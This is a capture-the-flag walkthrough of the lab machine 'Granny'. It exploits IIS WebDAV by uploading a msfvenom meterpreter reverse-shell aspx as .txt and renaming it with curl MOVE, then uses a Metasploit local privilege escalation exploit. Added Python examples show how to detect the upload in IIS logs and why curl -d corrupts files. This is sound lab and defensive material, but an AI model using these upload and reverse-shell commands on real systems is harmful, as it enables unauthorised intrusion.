
Introduction:
Granny, while similar to Grandpa, can be exploited using several different methods. The intended method of solving this machine is the widely-known WebDAV upload vulnerability.
I learned a lot from this machine because it was the first time working on WebDAV, and also I hadn’t faced any machine that is exploited by uploading files through requests; it really added a lot to me :D
Skills Required:
- Basic knowledge of Windows
- Enumerating ports and services
- Basic knowledge of Metasploit usage
Skills Learned:
- Identifying known vulnerabilities
- Basic HTTP request knowledge
- Basic Windows privilege escalation techniques
Used Tools:
- Nmap
- Davtest
- Curl
- Msfvenom
- Metasploit
1. SCANNING & ENUMERATION
I will start with nmap and the -A parameter to enable OS detection, version detection, script scanning, and traceroute, and pipe the output to the tee command, which saves it in a file named “nmap” and also shows it on the screen.

Nmap is done with only port 80 open. I also noticed in the scan that several request methods are allowed; besides that, the webdav-scan output is particularly interesting…
After checking the website I found nothing; it is still under development… So let’s enumerate the directories:

I tried to navigate through them but I hit a brick wall, so I had to think of another way…
By checking the response of the server:

The X-Powered-By: ASP.NET header tells me that aspx files may execute if I can get them onto the target.
WebDav:
WebDAV (Web Distributed Authoring and Versioning) is an extension of the HTTP that allows clients to perform remote Web content authoring operations.
As noticed in the nmap scan, webdav-scan showed methods such as PUT and MOVE. I might be able to upload files this way.
I will use a tool called davtest, which is pre-installed in Kali. It scans the website for us and shows whether we can create directories, upload/execute files, and the headers for that…
davtest -url http://10.10.10.15

The davtest scan shows that we can upload a lot of file types, but not aspx, which is what we want for the execution process…
Let’s try the upload process using curl, but before uploading you should check these parameters (-X, -d, -H); if you aren’t familiar with curl I will leave screenshots of their descriptions at the end of the write-up. Let’s continue…

-X PUT → to use the PUT method
-d @test.txt → to upload test.txt from our machine
It is successfully uploaded.
2. EXPLOITATION
The idea here is that we saw from the output of davtest that we can upload a txt file but not an aspx. So what about uploading the aspx file as txt and, after it is uploaded successfully, renaming it from .txt → .aspx? Let’s try it…
First we will generate a meterpreter reverse payload with msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.130 LPORT=1234 -f aspx > exploit.aspx

Then upload it to the site using curl…
curl -X PUT http://10.10.10.15/exploit.txt -d @exploit.aspx
Now we have successfully uploaded the payload. Let’s change it from txt to aspx:
curl -X MOVE -H 'Destination: http://10.10.10.15/exploit.aspx' http://10.10.10.15/exploit.txt
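From the defender’s side, this PUT-then-MOVE sequence is exactly what to look for in the web server’s logs. The script below is an added example (it is not from the write-up or from any tool used in it): it parses IIS 6 style W3C extended log lines and flags three things: any successful WebDAV write verb, a PUT followed within five minutes by a MOVE of the same path from the same client (the upload-as-txt-then-rename trick above), and a script-extension URL served to a client that has already written to the site. The log lines are constructed for the example and reuse the write-up’s lab addresses; the field list, the five-minute window and the extension list are assumptions. One caveat a practitioner should know: IIS does not log the MOVE request’s Destination header, so the new file name only becomes visible when it is later requested.

```python
from datetime import datetime, timedelta

# WebDAV / HTTP verbs that change content on the server.
WRITE_VERBS = {"PUT", "MOVE", "COPY", "DELETE", "MKCOL", "PROPPATCH"}
# Extensions IIS hands to the ASP / ASP.NET handlers by default (assumed list).
SCRIPT_EXTS = (".asp", ".aspx", ".asa", ".cer", ".cdx", ".ashx", ".asmx")

# Constructed sample log in IIS W3C extended format; the #Fields line names the columns.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2020-01-01 12:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2020-01-01 12:00:01 10.10.10.15 GET / - 80 - 10.10.16.130 curl/7.74.0 200 0 0
2020-01-01 12:00:02 10.10.10.15 PROPFIND / - 80 - 10.10.16.130 davtest 207 0 0
2020-01-01 12:00:05 10.10.10.15 PUT /exploit.txt - 80 - 10.10.16.130 curl/7.74.0 201 0 0
2020-01-01 12:00:09 10.10.10.15 MOVE /exploit.txt - 80 - 10.10.16.130 curl/7.74.0 201 0 0
2020-01-01 12:00:15 10.10.10.15 GET /exploit.aspx - 80 - 10.10.16.130 Mozilla/5.0 200 0 0
2020-01-01 12:00:20 10.10.10.15 GET /index.html - 80 - 192.168.1.50 Mozilla/5.0 200 0 0
"""


def parse_w3c(text: str) -> list[dict]:
    """Turn W3C extended log text into one dict per request, keyed by field name."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields is None:
            raise ValueError("data line before #Fields header")
        else:
            parts = line.split(" ")
            # IIS encodes spaces inside values as '+', so a plain split is safe.
            if len(parts) == len(fields):
                rows.append(dict(zip(fields, parts)))
    return rows


def analyse(rows: list[dict], window: timedelta = timedelta(minutes=5)) -> list[tuple]:
    """Return (rule, timestamp, detail) findings for the three patterns described above."""
    findings = []
    last_put = {}    # client ip -> (time, path) of its most recent successful PUT
    writers = set()  # clients that have successfully used a write verb
    for r in rows:
        ts = datetime.strptime(f"{r['date']} {r['time']}", "%Y-%m-%d %H:%M:%S")
        method, path, client = r["cs-method"], r["cs-uri-stem"], r["c-ip"]
        if not 200 <= int(r["sc-status"]) < 300:
            continue  # only successful requests matter for these rules
        if method in WRITE_VERBS:
            findings.append(("webdav-write", ts, f"{client} {method} {path}"))
            writers.add(client)
            if method == "PUT":
                last_put[client] = (ts, path)
            elif method == "MOVE" and client in last_put:
                put_ts, put_path = last_put[client]
                if put_path == path and ts - put_ts <= window:
                    findings.append(("upload-then-rename", ts, f"{client} PUT then MOVE {path}"))
        elif method == "GET" and path.lower().endswith(SCRIPT_EXTS) and client in writers:
            findings.append(("script-served-to-writer", ts, f"{client} GET {path}"))
    return findings


def run_sample() -> list[tuple]:
    """Run the rules over the constructed log."""
    return analyse(parse_w3c(SAMPLE_LOG))


if __name__ == "__main__":
    for rule, ts, detail in run_sample():
        print(f"{ts:%Y-%m-%d %H:%M:%S} {rule:24} {detail}")
```

The first rule is noisy on a server that legitimately uses WebDAV authoring, so in practice it is scoped to unauthenticated clients (cs-username is “-” above) or to addresses outside the authoring network. On IIS 6 the mitigation is simpler than detection: WebDAV is a Web Service Extension that can be set to Prohibited in IIS Manager, and the web root should not be writable by the anonymous IIS account; either removes the precondition this whole write-up relies on.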

Start Metasploit’s Handler:

Execute the payload by accessing http://10.10.10.15/exploit.aspx
It FAILS…

Why!!? If we look at exploit.txt we will see that the whitespace is all jacked up…

I’ll upload again, this time using --data-binary to preserve line endings and other control characters:
curl -X PUT http://10.10.10.15/exploit.txt --data-binary @exploit.aspx
curl -X MOVE -H 'Destination: http://10.10.10.15/exploit.aspx' http://10.10.10.15/exploit.txt
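The failure above comes from a documented curl behaviour: when -d/--data reads its body from a file it strips carriage returns and newlines before sending, whereas --data-binary sends the file byte for byte. The following Python is an added example (not from the write-up) that models the two modes and adds the integrity check a practitioner would use after any file transfer: compare a hash of the local file with a hash of what the server stored. The sample body is constructed; the function names are mine.

```python
import hashlib


def as_curl_data(body: bytes) -> bytes:
    """Model `curl -d @file`: curl removes CR and LF from the file contents."""
    return body.replace(b"\r", b"").replace(b"\n", b"")


def as_curl_data_binary(body: bytes) -> bytes:
    """Model `curl --data-binary @file`: contents are sent exactly as read."""
    return body


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def integrity_report(local: bytes, stored: bytes) -> dict:
    """Summarise what changed between the local file and what the server kept."""
    return {
        "intact": sha256_hex(local) == sha256_hex(stored),
        "bytes_lost": len(local) - len(stored),
        "lines_local": local.count(b"\n"),
        "lines_stored": stored.count(b"\n"),
    }


# Constructed multi-line body with CRLF line endings, as a Windows-generated file would have.
SAMPLE = b"line one\r\nline two\r\n\r\nline four\r\n"


def compare_modes(body: bytes = SAMPLE) -> dict:
    """Report integrity of the same body sent with -d and with --data-binary."""
    return {
        "data": integrity_report(body, as_curl_data(body)),
        "data_binary": integrity_report(body, as_curl_data_binary(body)),
    }


if __name__ == "__main__":
    for mode, report in compare_modes().items():
        print(mode, report)
```

The same check works on the server side: hashing a stored file against the value the uploader expected is how a transfer problem is told apart from a permissions or handler problem, which is the question the author was left with when the page would not run.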
Then execute it and check the handler…

The exploit succeeded and we have a meterpreter session on the server :D

But when we try to access Lakis’s folder to get the user flag, it gives Access is denied.
Let’s try to elevate our privileges…
3. PRIVILEGE ESCALATION
Let’s check out local exploits; we won’t get an easier or better option than Metasploit’s module (multi/recon/local_exploit_suggester).
So first background your session and get its session id, then:
use multi/recon/local_exploit_suggester

It suggests a lot of local exploits. Ignore the first one because it is not validated… Let’s try ms14_058_track_popup_menu:
use exploit/windows/local/ms14_058_track_popup_menu

The exploit succeeded. Let’s check our privilege level…

BOOOOOOOOOOOOOOOOOOOOM!!!!! Now we are root :D
You’ll find the two flags at:
user → C:\Documents and Settings\Lakis\Desktop\user.txt
root→ C:\Documents and Settings\Administrator\Desktop\root.txt
Thank you so much for reading and I hope you learned a lot as I did ❤
0x3ashry
Curl options:


